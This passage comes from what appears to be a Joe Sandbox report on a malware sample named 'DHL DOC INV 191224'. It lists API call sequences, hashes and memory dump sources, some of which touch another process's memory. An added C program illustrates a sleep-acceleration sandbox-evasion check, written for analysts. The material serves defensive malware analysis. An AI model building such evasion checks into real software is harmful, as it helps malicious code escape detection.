• GetPixel.GDI32(00000000,?,00000003), ref: 003B09B0
• ReleaseDC.USER32(00000000,00000003), ref: 003B09E8
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0036CDC6
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0036CDE9
  • Part of subcall function 00363820: RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0036CE0F
• _free.LIBCMT ref: 0036CE22
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0036CE31
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00349693
• SelectObject.GDI32(?,00000000), ref: 003496A2
• BeginPath.GDI32(?), ref: 003496B9
• SelectObject.GDI32(?,00000000), ref: 003496E2
APIs
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
• Opcode ID: 1f8e02f0894decf80c229260fbd550aa6776128fb13327c8bf217085b2f98a0c
• Instruction ID: 7eda63687a5af1463584d41d524440321438e40f1007895826f09450900bc4c2
• Opcode Fuzzy Hash: 1f8e02f0894decf80c229260fbd550aa6776128fb13327c8bf217085b2f98a0c
• Instruction Fuzzy Hash: 2A01F1A6341A09BFEA0B6A50AD92FFB736D9B303A5F004024FD049E641F730EF5483A0
APIs
• GetLastError.KERNEL32(?,?,?,0035F2DE,00363863,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6), ref: 00362DFD
• _free.LIBCMT ref: 00362E32
• _free.LIBCMT ref: 00362E59
• SetLastError.KERNEL32(00000000,00331129), ref: 00362E66
• SetLastError.KERNEL32(00000000,00331129), ref: 00362E6F
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 64ba284c79399a1fb61112d9f48d714a04da7ab973cf73cac78882551c23f36b
• Instruction ID: 0959f250a0796f3d74ac0564189e1748b99fbdb479aa166c45a9ee2857da9924
• Opcode Fuzzy Hash: 64ba284c79399a1fb61112d9f48d714a04da7ab973cf73cac78882551c23f36b
• Instruction Fuzzy Hash: 1401F436645E0067C61327346D49D2B265DABD23A1F27D438F425E62DAEB368C118220
APIs
• CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?,?,0039035E), ref: 0039002B
• ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?), ref: 00390046
• lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?), ref: 00390054
• CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?), ref: 00390064
• CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?), ref: 00390070
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
• Opcode ID: 922197dea8e4ec4164d39adc31493122c4c7017bd2b9b4a1351964d14a2e8bc9
• Instruction ID: d16f3209618d3e712bc5561f685a904693ce9b400f52a9d94cda65bfd5d2c2f0
• Opcode Fuzzy Hash: 922197dea8e4ec4164d39adc31493122c4c7017bd2b9b4a1351964d14a2e8bc9
• Instruction Fuzzy Hash: 53018B76610204BFDF169F68DC04FAE7AEDEB44792F145124F909D2210E775ED408BA0
APIs
• QueryPerformanceCounter.KERNEL32(?), ref: 0039E997
• QueryPerformanceFrequency.KERNEL32(?), ref: 0039E9A5
• Sleep.KERNEL32(00000000), ref: 0039E9AD
• QueryPerformanceCounter.KERNEL32(?), ref: 0039E9B7
• Sleep.KERNEL32 ref: 0039E9F3
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
• Opcode ID: 0ed2784ca579f956c7f3928bdcec1520f6e7addfb8161bbb4ca41de0f67fd0f0
• Instruction ID: de5f8a3087586b7017ad07987b8f7b39e6c90cd5382df53c46c9d972ecd0c1ee
• Opcode Fuzzy Hash: 0ed2784ca579f956c7f3928bdcec1520f6e7addfb8161bbb4ca41de0f67fd0f0
• Instruction Fuzzy Hash: 37015731C11629DBCF02EBE5DC59AEDBB7CFB08300F050946E502B2241CB38A950CBA1
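The QueryPerformanceCounter / Sleep / QueryPerformanceCounter chain listed above has the shape of a sleep-acceleration check: a sample sleeps, measures how much wall-clock time actually passed, and treats a shortfall as evidence of a sandbox that fast-forwards Sleep. The report does not say that this particular function plays that role in the sample; in an AutoIt-compiled binary the same chain can simply be the runtime's own timer. The following program is an added illustration written for this page, not code from the report or from the sample, and it shows what such a check measures so an analyst can reproduce the measurement on a suspect host. The 0.5 threshold and the function names are assumptions chosen for illustration; on non-Windows builds it falls back to clock_gettime and nanosleep so it can be compiled anywhere.

```c
/*
 * Added illustration (not from the report or the sample): measure whether
 * Sleep() is honoured in real time, the way a sleep-acceleration sandbox
 * check does. On Windows this uses the same QueryPerformanceCounter /
 * QueryPerformanceFrequency / Sleep calls the listing shows; elsewhere it
 * falls back to POSIX clock_gettime / nanosleep.
 *
 * Build: cl /W4 sleepcheck.c             (Windows)
 *        cc -Wall -o sleepcheck sleepcheck.c   (POSIX)
 */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <stdio.h>
#ifdef _WIN32
#include <windows.h>
#else
#include <time.h>
#endif

/* Monotonic time in milliseconds. */
static double now_ms(void)
{
#ifdef _WIN32
    LARGE_INTEGER freq, ctr;
    QueryPerformanceFrequency(&freq);
    QueryPerformanceCounter(&ctr);
    return (double)ctr.QuadPart * 1000.0 / (double)freq.QuadPart;
#else
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (double)ts.tv_sec * 1000.0 + (double)ts.tv_nsec / 1e6;
#endif
}

/* Sleep for the requested number of milliseconds. */
static void sleep_ms(unsigned ms)
{
#ifdef _WIN32
    Sleep(ms);
#else
    struct timespec ts;
    ts.tv_sec = ms / 1000;
    ts.tv_nsec = (long)(ms % 1000) * 1000000L;
    nanosleep(&ts, NULL);
#endif
}

/* Sleep for requested_ms and return elapsed / requested.
 * A Sleep that is hooked or fast-forwarded (common in sandboxes) yields a
 * ratio well below 1; an honoured Sleep yields a ratio of 1 or slightly more. */
double measure_sleep_ratio(unsigned requested_ms)
{
    double start = now_ms();
    sleep_ms(requested_ms);
    double elapsed = now_ms() - start;
    return elapsed / (double)requested_ms;
}

/* Decision rule an evasive sample might apply. The 0.5 threshold is an
 * assumption chosen for illustration, not a value taken from the sample. */
int sleep_looks_accelerated(double ratio)
{
    return ratio < 0.5;
}

int main(void)
{
    double r = measure_sleep_ratio(200);
    printf("sleep ratio: %.2f -> %s\n", r,
           sleep_looks_accelerated(r) ? "accelerated (sandbox-like)"
                                      : "honoured");
    return 0;
}
```

When triaging such a function in a disassembler, the tell is not the timer calls themselves (every GUI runtime has them) but a comparison of the measured delta against the requested delay followed by a branch that changes the sample's behaviour, such as exiting or skipping the payload.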
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00391114
• GetLastError.KERNEL32(?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391120
• GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 0039112F
• HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391136
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0039114D
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
• Opcode ID: 0b5000002571fb3ac735974c4e422bc7b8ceb60583ab2b2d9ea706238c0fd441
• Instruction ID: f4b8a583e418e8e6c59502374420b1b21ab5e941ab30a55de65b41717774a9d4
• Opcode Fuzzy Hash: 0b5000002571fb3ac735974c4e422bc7b8ceb60583ab2b2d9ea706238c0fd441
• Instruction Fuzzy Hash: 40011979210205BFDB124FA5DC4DE6A3B6EEF893A0F254419FA49D7360DB31EC019B60
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00390FCA
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00390FD6
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00390FE5
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00390FEC
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00391002
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: 8c82d1089d589c5e1b7f3af3456c0f29adbd9d6387f07880c916af338edfe7d4
• Instruction ID: d15f2590ac83ac9ca55a116c9e073da48f73978d64144c7e32aa92c01500f869
• Opcode Fuzzy Hash: 8c82d1089d589c5e1b7f3af3456c0f29adbd9d6387f07880c916af338edfe7d4
• Instruction Fuzzy Hash: 6DF04939210312ABDB224FA5AC49F563BADFF89762F154414FA49D6251CA71EC40CB60
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 0039102A
• GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 00391036
• GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 00391045
• HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 0039104C
• GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 00391062
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: 7e38ac65e4aaa94e32b4fa2620f5833328ab13785e8eaef0b0ae908c0312aeed
• Instruction ID: 5f4eb8d2b203193ee7c8d6312e85af05f6c3abc1ae045fb359b3f0e45eb9dc8b
• Opcode Fuzzy Hash: 7e38ac65e4aaa94e32b4fa2620f5833328ab13785e8eaef0b0ae908c0312aeed
• Instruction Fuzzy Hash: 30F06D39210312EBDB236FA5EC49F563BADFF897A1F150414FA49D7250CA71E8408B60
APIs
• CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A0324
• CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A0331
• CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A033E
• CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A034B
• CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A0358
• CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A0365
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: b1c7b035b07d8f8bbaa776d36cfb266c41b7c55c9d21c97e0744dda150176431
• Instruction ID: ac43862df00c9d4a57ab0154d64256190a85d199bdbf366b6b0ca21c88759b85
• Opcode Fuzzy Hash: b1c7b035b07d8f8bbaa776d36cfb266c41b7c55c9d21c97e0744dda150176431
• Instruction Fuzzy Hash: 6F01EE7A800B018FCB36AF66D880802FBF9FF613053068A3FD19652970C3B1A948CF80
APIs
• _free.LIBCMT ref: 0036D752
  • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
  • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
• _free.LIBCMT ref: 0036D764
• _free.LIBCMT ref: 0036D776
• _free.LIBCMT ref: 0036D788
• _free.LIBCMT ref: 0036D79A
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 02914dbda1f049de4e942836dbfd0ef79e9d63914e166abbaf347bc4457efa37
• Instruction ID: 25088ef0dd8a663047f7afbc113753d250dc0d5d45ecab6d462a12b974622e66
• Opcode Fuzzy Hash: 02914dbda1f049de4e942836dbfd0ef79e9d63914e166abbaf347bc4457efa37
• Instruction Fuzzy Hash: A1F01232B54608ABC627EF64FAC5C2777DDBB46750B969805F048DB509CB30FC90C665
APIs
• _free.LIBCMT ref: 003622BE
  • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
  • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
• _free.LIBCMT ref: 003622D0
• _free.LIBCMT ref: 003622E3
• _free.LIBCMT ref: 003622F4
• _free.LIBCMT ref: 00362305
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: e39be8d8c096aafcc24cab3b3a44b49a4f6556971ba00d3a94f8e13cf5b1d85a
• Instruction ID: c698bccd591acda3dcc594fb1fae344dfe7885d17adda8952b4225fd206e1edb
• Opcode Fuzzy Hash: e39be8d8c096aafcc24cab3b3a44b49a4f6556971ba00d3a94f8e13cf5b1d85a
• Instruction Fuzzy Hash: BEF0B4705509118BC717AF54BE0191A3BE4F71A790F02456EF000F6279C7750821FFE9
APIs
• EndPath.GDI32(?), ref: 003495D4
• StrokeAndFillPath.GDI32(?,?,003871F7,00000000,?,?,?), ref: 003495F0
• SelectObject.GDI32(?,00000000), ref: 00349603
• DeleteObject.GDI32 ref: 00349616
• StrokePath.GDI32(?), ref: 00349631
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
• Opcode ID: 5cdcc12b845f7277d1ffe16f25359259770ae86d52786bc99064f619a5adf66a
• Instruction ID: 85e92859b8d61c1a982ebb4056d3cc0f03d467180297ba19382af70a4e8a123a
• Opcode Fuzzy Hash: 5cdcc12b845f7277d1ffe16f25359259770ae86d52786bc99064f619a5adf66a
• Instruction Fuzzy Hash: 83F04F71005204EFDB135F65EE1CB653FA9BB01332F148225F469A90F0C734A991DF28
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: __freea$_free
• String ID: a/p$am/pm
• API String ID: 3432400110-3206640213
• Opcode ID: aff7bbb9f3c84de0c01fbc417cefb8f160a1ee63aae78cfa09716651790a1d71
• Instruction ID: ac3fc6f415ba77bcb67fda250c3576871ab36d4fc048c988165f79a1dedc038a
• Opcode Fuzzy Hash: aff7bbb9f3c84de0c01fbc417cefb8f160a1ee63aae78cfa09716651790a1d71
• Instruction Fuzzy Hash: 45D10339900206CACB2B9F68C855BFAB7B4FF06300F2DC159E9069BB58D3759D80CB91
APIs
  • Part of subcall function 00350242: EnterCriticalSection.KERNEL32(0040070C,00401884,?,?,0034198B,00402518,?,?,?,003312F9,00000000), ref: 0035024D
  • Part of subcall function 00350242: LeaveCriticalSection.KERNEL32(0040070C,?,0034198B,00402518,?,?,?,003312F9,00000000), ref: 0035028A
  • Part of subcall function 003500A3: __onexit.LIBCMT ref: 003500A9
• __Init_thread_footer.LIBCMT ref: 003B6238
  • Part of subcall function 003501F8: EnterCriticalSection.KERNEL32(0040070C,?,?,00348747,00402514), ref: 00350202
  • Part of subcall function 003501F8: LeaveCriticalSection.KERNEL32(0040070C,?,00348747,00402514), ref: 00350235
  • Part of subcall function 003A359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 003A35E4
  • Part of subcall function 003A359C: LoadStringW.USER32(00402390,?,00000FFF,?), ref: 003A360A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
• String ID: x#@$x#@$x#@
• API String ID: 1072379062-2468959183
• Opcode ID: b3c5a518d3cae9d24f5fe6fb8790c14b986f1ab2a56afbd6222915c5dd61a770
• Instruction ID: df6b68be03d2e3ac3a4eee46a37992ed5722ace6b75ef8d3fab6bd6f5d8952ed
• Opcode Fuzzy Hash: b3c5a518d3cae9d24f5fe6fb8790c14b986f1ab2a56afbd6222915c5dd61a770
• Instruction Fuzzy Hash: 90C19071A00105AFDB26DF58C891EFEB7B9EF49304F11802AFA05AB692D774ED44CB90
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00368B6E
• GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00368B7A
• __dosmaperr.LIBCMT ref: 00368B81
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: ByteCharErrorLastMultiWide__dosmaperr
• String ID: .5
• API String ID: 2434981716-4279605997
• Opcode ID: 402a0d0688d3c158dc701cd06dad14a6e7f003127cde269439354ef8be1761f5
• Instruction ID: 5e70548a9316937d7a28264921870ad77b51c1bfeda0cebb3368f074f60b3547
• Opcode Fuzzy Hash: 402a0d0688d3c158dc701cd06dad14a6e7f003127cde269439354ef8be1761f5
• Instruction Fuzzy Hash: 7F41ACB0604045AFDB239F68C880AB93FAADF4D304F29C7A9F8849B546DE318C029794
APIs
  • Part of subcall function 0039B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003921D0,?,?,00000034,00000800,?,00000034), ref: 0039B42D
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00392760
  • Part of subcall function 0039B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003921FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0039B3F8
  • Part of subcall function 0039B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0039B355
  • Part of subcall function 0039B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00392194,00000034,?,?,00001004,00000000,00000000), ref: 0039B365
  • Part of subcall function 0039B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00392194,00000034,?,?,00001004,00000000,00000000), ref: 0039B37B
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003927CD
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0039281A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
• Opcode ID: a0442feec99f3f3b1edf5e39ea79fb409f6be6ac1a0ce769fd78c2a38367db28
